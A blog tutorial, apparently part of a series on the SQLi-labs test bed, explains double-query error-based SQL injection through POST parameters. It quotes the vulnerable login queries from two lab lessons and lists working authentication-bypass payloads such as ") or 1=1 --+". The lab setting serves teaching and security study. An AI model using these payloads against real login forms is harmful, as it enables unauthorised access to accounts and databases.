In the last part we started to explore the error based sql injections in the POST parameters. We were able to use the UNION statements to dump the database of the test bed. In a situation when the database does not interact with the web page and only was the database displays some info on the web page is through the mysql errors. Then in this case the fastest way to extract the info is through use of type caste errors involving sub queries also referred to as double queries, but MYSQL is very flexible and returns empty rows rather than throwing an error, so infosec guru's figured out some combinations of functions, if combined make sql queries which pass the compile time check but throw run-time errors. With the errors dumps the useful info which is needed.
DOUBLE QUERY INJECTIONS
CAUTION: This is for educational purposes only, please do not use the skills you gain from following the video lessons, blog to harm or test sites on the internet for whom you do not have permissions. Doing so is illegal. I do not support these sort of activities and would advice you all to stay away from the same... If you do so you are solely responsible for your actions, you have been warned.
As these involve sub query injections, the focus is to use the internal query to dump the info we want and wrap around a query which is syntactically correct, passing the compile time checks and produces error at run time and in process spit the core query as part of error.
In MYSQL this is achieved by using combination of count() and group by clause. In my personal understanding issue happens when the aggregate functions produce dynamic entries and group by clause clubs them and with the next round of aggregate function finds the values changed, causing duplicate entry issues. We discussed the same during the part 6. There the injection point was in GET parameter, and in this we used the POST parameter.
For detailed instructions, you can follow the video.
Basic query to cause injections :
Less-13 line number 57
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
') or ('1')=('1 Will work nicely if injected in username and password field. username = (' ') or ('1')=('1 ') AND password = (' ') or ('1')=('1 ')
') or 1=1 --+ Will also work only in one field. username = (' ') or 1=1 --+ ' commented out
') or 1=1 # will also work only in one field. username = (' ') or 1=1 # ' commented out
Less-14 Line 57,58,59
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
" or "1"="1 Will work nicely. username = " " or "1"="1 " AND password = " " or "1"= "1 "
" or 1=1 --+ Will also work. username = " " or 1=1 --+ " commented out
" or 1=1 # will also work. username = " " or 1=1 # " commented out